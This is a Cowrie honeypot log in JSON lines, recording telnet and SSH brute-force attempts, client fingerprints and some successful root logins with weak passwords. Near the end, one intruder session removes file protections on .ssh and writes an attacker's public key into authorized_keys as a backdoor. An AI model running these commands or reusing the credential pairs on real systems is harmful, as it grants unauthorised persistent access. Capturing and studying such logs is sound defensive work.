{"eventid":"cowrie.session.closed","duration":12.795834064483643,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:04:46.780334Z","src_ip":"42.87.185.109","session":"0e81e28a3173"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":57725,"dst_ip":"1.2.3.4","dst_port":23,"session":"58b9bad96db9","protocol":"telnet","message":"New connection: 42.87.185.109:57725 (1.2.3.4:23) [session: 58b9bad96db9]","sensor":"my-vps","timestamp":"2025-08-26T07:04:46.998294Z"}
{"eventid":"cowrie.session.closed","duration":12.608473300933838,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:04:50.782124Z","src_ip":"42.87.185.109","session":"8342be578160"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":57758,"dst_ip":"1.2.3.4","dst_port":23,"session":"57e848de3ae8","protocol":"telnet","message":"New connection: 42.87.185.109:57758 (1.2.3.4:23) [session: 57e848de3ae8]","sensor":"my-vps","timestamp":"2025-08-26T07:04:50.975564Z"}
{"eventid":"cowrie.session.closed","duration":12.746604681015015,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:04:57.891409Z","src_ip":"42.87.185.109","session":"82857d1906b4"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":57920,"dst_ip":"1.2.3.4","dst_port":23,"session":"f1740c8872bf","protocol":"telnet","message":"New connection: 42.87.185.109:57920 (1.2.3.4:23) [session: f1740c8872bf]","sensor":"my-vps","timestamp":"2025-08-26T07:04:58.105165Z"}
{"eventid":"cowrie.session.closed","duration":12.89966869354248,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:04:59.897853Z","src_ip":"42.87.185.109","session":"58b9bad96db9"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":57939,"dst_ip":"1.2.3.4","dst_port":23,"session":"2d9643f47f28","protocol":"telnet","message":"New connection: 42.87.185.109:57939 (1.2.3.4:23) [session: 2d9643f47f28]","sensor":"my-vps","timestamp":"2025-08-26T07:05:00.100637Z"}
{"eventid":"cowrie.session.closed","duration":12.834970235824585,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:05:03.810427Z","src_ip":"42.87.185.109","session":"57e848de3ae8"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":57994,"dst_ip":"1.2.3.4","dst_port":23,"session":"d022f3f512af","protocol":"telnet","message":"New connection: 42.87.185.109:57994 (1.2.3.4:23) [session: d022f3f512af]","sensor":"my-vps","timestamp":"2025-08-26T07:05:04.011623Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":51768,"dst_ip":"1.2.3.4","dst_port":22,"session":"baf0a2acf433","protocol":"ssh","message":"New connection: 103.12.154.87:51768 (1.2.3.4:22) [session: baf0a2acf433]","sensor":"my-vps","timestamp":"2025-08-26T07:05:07.255463Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:05:07.259100Z","src_ip":"103.12.154.87","session":"baf0a2acf433"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:05:07.469626Z","src_ip":"103.12.154.87","session":"baf0a2acf433"}
{"eventid":"cowrie.login.failed","username":"qiong","password":"qiong","message":"login attempt [qiong/qiong] failed","sensor":"my-vps","timestamp":"2025-08-26T07:05:08.320502Z","src_ip":"103.12.154.87","session":"baf0a2acf433"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:05:10.025439Z","src_ip":"103.12.154.87","session":"baf0a2acf433"}
{"eventid":"cowrie.session.closed","duration":12.801769495010376,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:05:10.906876Z","src_ip":"42.87.185.109","session":"f1740c8872bf"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":58159,"dst_ip":"1.2.3.4","dst_port":23,"session":"32af91c27acc","protocol":"telnet","message":"New connection: 42.87.185.109:58159 (1.2.3.4:23) [session: 32af91c27acc]","sensor":"my-vps","timestamp":"2025-08-26T07:05:11.098981Z"}
{"eventid":"cowrie.session.closed","duration":12.756226778030396,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:05:12.856794Z","src_ip":"42.87.185.109","session":"2d9643f47f28"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":58177,"dst_ip":"1.2.3.4","dst_port":23,"session":"b88b691df6b2","protocol":"telnet","message":"New connection: 42.87.185.109:58177 (1.2.3.4:23) [session: b88b691df6b2]","sensor":"my-vps","timestamp":"2025-08-26T07:05:13.029038Z"}
{"eventid":"cowrie.session.closed","duration":12.745622158050537,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:05:16.757133Z","src_ip":"42.87.185.109","session":"d022f3f512af"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":58332,"dst_ip":"1.2.3.4","dst_port":23,"session":"dfe429bb49b1","protocol":"telnet","message":"New connection: 42.87.185.109:58332 (1.2.3.4:23) [session: dfe429bb49b1]","sensor":"my-vps","timestamp":"2025-08-26T07:05:16.945483Z"}
{"eventid":"cowrie.session.closed","duration":12.84454870223999,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:05:23.943461Z","src_ip":"42.87.185.109","session":"32af91c27acc"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":58378,"dst_ip":"1.2.3.4","dst_port":23,"session":"6fd5ad549107","protocol":"telnet","message":"New connection: 42.87.185.109:58378 (1.2.3.4:23) [session: 6fd5ad549107]","sensor":"my-vps","timestamp":"2025-08-26T07:05:24.111948Z"}
{"eventid":"cowrie.session.closed","duration":12.716363906860352,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:05:25.745333Z","src_ip":"42.87.185.109","session":"b88b691df6b2"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":58415,"dst_ip":"1.2.3.4","dst_port":23,"session":"aca5f9b4a954","protocol":"telnet","message":"New connection: 42.87.185.109:58415 (1.2.3.4:23) [session: aca5f9b4a954]","sensor":"my-vps","timestamp":"2025-08-26T07:05:25.956082Z"}
{"eventid":"cowrie.session.closed","duration":12.883615493774414,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:05:29.829030Z","src_ip":"42.87.185.109","session":"dfe429bb49b1"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":58539,"dst_ip":"1.2.3.4","dst_port":23,"session":"1a366af8c4cb","protocol":"telnet","message":"New connection: 42.87.185.109:58539 (1.2.3.4:23) [session: 1a366af8c4cb]","sensor":"my-vps","timestamp":"2025-08-26T07:05:29.971546Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":42232,"dst_ip":"1.2.3.4","dst_port":22,"session":"26eb5d3c24b8","protocol":"ssh","message":"New connection: 45.88.8.186:42232 (1.2.3.4:22) [session: 26eb5d3c24b8]","sensor":"my-vps","timestamp":"2025-08-26T07:05:36.128175Z"}
{"eventid":"cowrie.session.closed","duration":12.707878351211548,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:05:36.819757Z","src_ip":"42.87.185.109","session":"6fd5ad549107"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":58617,"dst_ip":"1.2.3.4","dst_port":23,"session":"c9453d91abe2","protocol":"telnet","message":"New connection: 42.87.185.109:58617 (1.2.3.4:23) [session: c9453d91abe2]","sensor":"my-vps","timestamp":"2025-08-26T07:05:37.007853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T07:05:37.329082Z","src_ip":"45.88.8.186","session":"26eb5d3c24b8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T07:05:37.329783Z","src_ip":"45.88.8.186","session":"26eb5d3c24b8"}
{"eventid":"cowrie.session.closed","duration":12.914570093154907,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:05:38.870586Z","src_ip":"42.87.185.109","session":"aca5f9b4a954"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":58727,"dst_ip":"1.2.3.4","dst_port":23,"session":"3334a7932587","protocol":"telnet","message":"New connection: 42.87.185.109:58727 (1.2.3.4:23) [session: 3334a7932587]","sensor":"my-vps","timestamp":"2025-08-26T07:05:39.021977Z"}
{"eventid":"cowrie.login.success","username":"root","password":"qwqwqw@","message":"login attempt [root/qwqwqw@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:05:39.888697Z","src_ip":"45.88.8.186","session":"26eb5d3c24b8"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:05:40.541371Z","src_ip":"45.88.8.186","session":"26eb5d3c24b8"}
{"eventid":"cowrie.session.closed","duration":12.881632089614868,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:05:42.853110Z","src_ip":"42.87.185.109","session":"1a366af8c4cb"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":58759,"dst_ip":"1.2.3.4","dst_port":23,"session":"7d5099db27c6","protocol":"telnet","message":"New connection: 42.87.185.109:58759 (1.2.3.4:23) [session: 7d5099db27c6]","sensor":"my-vps","timestamp":"2025-08-26T07:05:43.090775Z"}
{"eventid":"cowrie.session.closed","duration":12.753060340881348,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:05:49.760840Z","src_ip":"42.87.185.109","session":"c9453d91abe2"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":58923,"dst_ip":"1.2.3.4","dst_port":23,"session":"1f09823640a3","protocol":"telnet","message":"New connection: 42.87.185.109:58923 (1.2.3.4:23) [session: 1f09823640a3]","sensor":"my-vps","timestamp":"2025-08-26T07:05:49.960206Z"}
{"eventid":"cowrie.session.closed","duration":12.692488193511963,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:05:51.714403Z","src_ip":"42.87.185.109","session":"3334a7932587"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":58937,"dst_ip":"1.2.3.4","dst_port":23,"session":"d97566d2e9d6","protocol":"telnet","message":"New connection: 42.87.185.109:58937 (1.2.3.4:23) [session: d97566d2e9d6]","sensor":"my-vps","timestamp":"2025-08-26T07:05:51.906239Z"}
{"eventid":"cowrie.session.closed","duration":12.755763053894043,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:05:55.846466Z","src_ip":"42.87.185.109","session":"7d5099db27c6"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":58975,"dst_ip":"1.2.3.4","dst_port":23,"session":"3ea454be1e7c","protocol":"telnet","message":"New connection: 42.87.185.109:58975 (1.2.3.4:23) [session: 3ea454be1e7c]","sensor":"my-vps","timestamp":"2025-08-26T07:05:56.055091Z"}
{"eventid":"cowrie.session.closed","duration":12.913693904876709,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:06:02.873833Z","src_ip":"42.87.185.109","session":"1f09823640a3"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":59143,"dst_ip":"1.2.3.4","dst_port":23,"session":"253b0340e7a5","protocol":"telnet","message":"New connection: 42.87.185.109:59143 (1.2.3.4:23) [session: 253b0340e7a5]","sensor":"my-vps","timestamp":"2025-08-26T07:06:03.050547Z"}
{"eventid":"cowrie.session.closed","duration":13.051268100738525,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:06:04.957420Z","src_ip":"42.87.185.109","session":"d97566d2e9d6"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":59156,"dst_ip":"1.2.3.4","dst_port":23,"session":"0cae6d4bbfa6","protocol":"telnet","message":"New connection: 42.87.185.109:59156 (1.2.3.4:23) [session: 0cae6d4bbfa6]","sensor":"my-vps","timestamp":"2025-08-26T07:06:05.110159Z"}
{"eventid":"cowrie.session.closed","duration":12.704556941986084,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:06:08.759580Z","src_ip":"42.87.185.109","session":"3ea454be1e7c"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":59180,"dst_ip":"1.2.3.4","dst_port":23,"session":"98ee63ff77f4","protocol":"telnet","message":"New connection: 42.87.185.109:59180 (1.2.3.4:23) [session: 98ee63ff77f4]","sensor":"my-vps","timestamp":"2025-08-26T07:06:08.962897Z"}
{"eventid":"cowrie.session.closed","duration":12.652220010757446,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:06:15.702695Z","src_ip":"42.87.185.109","session":"253b0340e7a5"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51160,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbdda16f6d66","protocol":"ssh","message":"New connection: 217.72.205.35:51160 (1.2.3.4:22) [session: fbdda16f6d66]","sensor":"my-vps","timestamp":"2025-08-26T07:06:15.884345Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:06:15.885401Z","src_ip":"217.72.205.35","session":"fbdda16f6d66"}
{"eventid":"cowrie.session.closed","duration":12.472477674484253,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:06:17.582536Z","src_ip":"42.87.185.109","session":"0cae6d4bbfa6"}
{"eventid":"cowrie.session.closed","duration":12.649140119552612,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:06:21.611969Z","src_ip":"42.87.185.109","session":"98ee63ff77f4"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":49830,"dst_ip":"1.2.3.4","dst_port":22,"session":"c729a9b39d52","protocol":"ssh","message":"New connection: 103.12.154.87:49830 (1.2.3.4:22) [session: c729a9b39d52]","sensor":"my-vps","timestamp":"2025-08-26T07:06:28.171016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:06:28.175921Z","src_ip":"103.12.154.87","session":"c729a9b39d52"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:06:28.389923Z","src_ip":"103.12.154.87","session":"c729a9b39d52"}
{"eventid":"cowrie.login.failed","username":"plex","password":"123","message":"login attempt [plex/123] failed","sensor":"my-vps","timestamp":"2025-08-26T07:06:30.528725Z","src_ip":"103.12.154.87","session":"c729a9b39d52"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:06:31.755313Z","src_ip":"103.12.154.87","session":"c729a9b39d52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46528,"dst_ip":"1.2.3.4","dst_port":23,"session":"7181aea1026b","protocol":"telnet","message":"New connection: 212.227.235.229:46528 (1.2.3.4:23) [session: 7181aea1026b]","sensor":"my-vps","timestamp":"2025-08-26T07:06:41.756772Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.235.229:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.235.229:23] failed","sensor":"my-vps","timestamp":"2025-08-26T07:06:41.757902Z","src_ip":"212.227.235.229","session":"7181aea1026b"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-26T07:06:41.759197Z","src_ip":"212.227.235.229","session":"7181aea1026b"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-26T07:06:41.760194Z","src_ip":"212.227.235.229","session":"7181aea1026b"}
{"eventid":"cowrie.session.closed","duration":0.15662932395935059,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:06:41.913329Z","src_ip":"212.227.235.229","session":"7181aea1026b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46532,"dst_ip":"1.2.3.4","dst_port":23,"session":"ea53dfc984ae","protocol":"telnet","message":"New connection: 212.227.235.229:46532 (1.2.3.4:23) [session: ea53dfc984ae]","sensor":"my-vps","timestamp":"2025-08-26T07:06:42.074489Z"}
{"eventid":"cowrie.session.closed","duration":0.0014557838439941406,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:06:42.075867Z","src_ip":"212.227.235.229","session":"ea53dfc984ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36889,"dst_ip":"1.2.3.4","dst_port":23,"session":"81e9765bd8e7","protocol":"telnet","message":"New connection: 212.227.125.160:36889 (1.2.3.4:23) [session: 81e9765bd8e7]","sensor":"my-vps","timestamp":"2025-08-26T07:07:27.788910Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":47888,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d0b85279f8f","protocol":"ssh","message":"New connection: 103.12.154.87:47888 (1.2.3.4:22) [session: 0d0b85279f8f]","sensor":"my-vps","timestamp":"2025-08-26T07:07:46.077850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:07:46.080487Z","src_ip":"103.12.154.87","session":"0d0b85279f8f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:07:46.305952Z","src_ip":"103.12.154.87","session":"0d0b85279f8f"}
{"eventid":"cowrie.login.success","username":"root","password":"QWE123456rty","message":"login attempt [root/QWE123456rty] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:07:47.903922Z","src_ip":"103.12.154.87","session":"0d0b85279f8f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:07:48.380249Z","src_ip":"103.12.154.87","session":"0d0b85279f8f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:07:48.381038Z","src_ip":"103.12.154.87","session":"0d0b85279f8f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:07:48.382124Z","src_ip":"103.12.154.87","session":"0d0b85279f8f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:07:48.610883Z","src_ip":"103.12.154.87","session":"0d0b85279f8f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:07:49.161444Z","src_ip":"103.12.154.87","session":"0d0b85279f8f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T07:07:49.162382Z","src_ip":"103.12.154.87","session":"0d0b85279f8f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T07:07:49.845178Z","src_ip":"103.12.154.87","session":"0d0b85279f8f"}
